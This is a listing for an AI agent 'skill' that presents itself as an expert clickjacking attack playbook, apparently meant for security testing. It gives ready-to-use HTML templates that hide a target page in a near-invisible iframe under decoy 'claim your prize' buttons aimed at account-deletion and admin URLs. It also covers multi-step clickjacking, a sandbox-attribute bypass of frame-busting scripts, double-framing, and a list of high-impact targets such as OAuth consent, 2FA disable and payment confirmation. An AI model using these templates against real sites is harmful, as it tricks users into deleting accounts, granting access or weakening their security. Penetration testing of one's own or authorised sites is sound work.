Clickjacking

by yaklang6fbf0bc8d5c7No license2.4K starsListed Oct 8, 2026Updated Oct 8, 2026Repository updated 3 weeks ago

Clickjacking playbook. Use when testing whether target pages can be framed, whether X-Frame-Options or CSP frame-ancestors are properly configured, and whether UI redress attacks can trigger sensitive actions.

Instructions onlySecurity
AI-generated overview

A clickjacking testing playbook covering frameability checks, bypass techniques, and proof-of-concept templates.

What it does
This skill provides a structured playbook for testing whether target web pages can be framed and are therefore vulnerable to clickjacking (UI redress) attacks. It explains how to inspect X-Frame-Options and CSP frame-ancestors headers, how to build single-click, multi-step, and drag-and-drop proof-of-concept pages, and how to attempt bypasses such as the sandbox attribute against frame-busting scripts. It also lists high-impact targets and a testing checklist.
When to use it
Use it when assessing whether a site's pages can be embedded in iframes and whether UI redress attacks could trigger sensitive actions. It suits security testing of header configuration and clickjacking exposure on authenticated or unauthenticated pages.
Requirements
No scripts are shipped; it is instructions only. Testing requires the ability to host or serve HTML proof-of-concept pages and a browser to load them against the target.

SKILL: Clickjacking — Expert Attack Playbook

AI LOAD INSTRUCTION: Clickjacking (UI redress) techniques. Covers iframe transparency tricks, X-Frame-Options bypass, CSP frame-ancestors, multi-step clickjacking, drag-and-drop attacks, and chaining with other vulnerabilities. Often a "low severity" finding that becomes critical when targeting admin actions.

1. CORE CONCEPT

Clickjacking loads a target page in a transparent iframe overlaid on an attacker's page. The victim sees the attacker's UI but clicks on the invisible target page, performing unintended actions.

html
<style>  iframe { position: absolute; top: 0; left: 0; width: 100%; height: 100%; opacity: 0.0001; z-index: 2; }  .decoy { position: absolute; top: 200px; left: 100px; z-index: 1; }</style><div class="decoy"><button>Click to win a prize!</button></div><iframe src="https://target.com/account/delete?confirm=yes"></iframe>

2. DETECTION — IS THE PAGE FRAMEABLE?

Check X-Frame-Options Header

X-Frame-Options: DENY           → cannot be framed (secure)X-Frame-Options: SAMEORIGIN     → only same-origin framing (secure for cross-origin)X-Frame-Options: ALLOW-FROM uri → deprecated, browser support inconsistent(header absent)                  → frameable! (vulnerable)

Check CSP frame-ancestors

Content-Security-Policy: frame-ancestors 'none'        → cannot be framedContent-Security-Policy: frame-ancestors 'self'         → same-origin onlyContent-Security-Policy: frame-ancestors https://a.com  → specific origin(directive absent)                                       → frameable

CSP frame-ancestors supersedes X-Frame-Options in modern browsers.

Quick PoC Test

html
<iframe src="https://target.com/sensitive-action" width="800" height="600"></iframe>

If the page loads in the iframe → frameable → potentially vulnerable.

JavaScript Frame Detection (from target page source)

javascript
// Common frame-busting code found in target pages:if (top.location.hostname !== self.location.hostname) {    top.location.href = self.location.href;}

If this code is present but not using CSP frame-ancestors, it can often be bypassed.


3. PROOF OF CONCEPT TEMPLATES

Basic Single-Click

html
<html><head><title>Free Prize</title></head><body><h1>Click the button to claim your prize!</h1><style>  iframe { position: absolute; top: 300px; left: 60px;           width: 500px; height: 200px; opacity: 0.0001; z-index: 2; }</style><iframe src="https://target.com/account/settings?action=delete"></iframe></body></html>

Multi-Step Clickjacking

For actions requiring multiple clicks (e.g., "Are you sure?" confirmation):

html
<div id="step1">  <button onclick="document.getElementById('step1').style.display='none';                    document.getElementById('step2').style.display='block';">    Step 1: Click here  </button></div><div id="step2" style="display:none">  <button>Step 2: Confirm</button></div><iframe src="https://target.com/admin/action"></iframe>

Reposition iframe for each step to align the transparent button with the decoy.

Drag-and-Drop Clickjacking

Extract data from one iframe to another using HTML5 drag-and-drop events — the victim drags across invisible iframes, transferring tokens or data.


4. BYPASS TECHNIQUES

Frame-Busting Script Bypass

Some pages use JavaScript frame-busting:

javascript
if (top !== self) { top.location = self.location; }

Bypass with sandbox attribute:

html
<iframe src="https://target.com" sandbox="allow-forms allow-scripts"></iframe><!-- sandbox without allow-top-navigation prevents frame-busting -->

X-Frame-Options ALLOW-FROM Bypass

ALLOW-FROM is not supported in Chrome/Safari. If the server relies solely on ALLOW-FROM, modern browsers ignore it → page is frameable.

Double-Framing

If X-Frame-Options: SAMEORIGIN is set, but a same-origin page exists that can be framed (without XFO), use that page as an intermediary to frame the target.


5. HIGH-IMPACT TARGETS

text
Account deletion pageEmail/password change formAdmin panel actions (add user, change role)Payment confirmationOAuth authorization ("Allow" button)Two-factor authentication disableAPI key generationWebhook configuration

6. TESTING CHECKLIST

□ Check X-Frame-Options header on sensitive pages□ Check CSP frame-ancestors directive□ Create iframe PoC and verify page loads□ Test frame-busting scripts — try sandbox attribute bypass□ Identify high-value single-click actions□ For multi-step actions, build multi-click PoC□ Test both authenticated and unauthenticated pages□ Verify ALLOW-FROM behavior across browsers

Source and attribution

Source:yaklang/hack-skillsinskills/clickjackingat commit6fbf0bc

License: No license

Content belongs to its original authors. SourceWeft indexes it from a public repository.

Report or request removal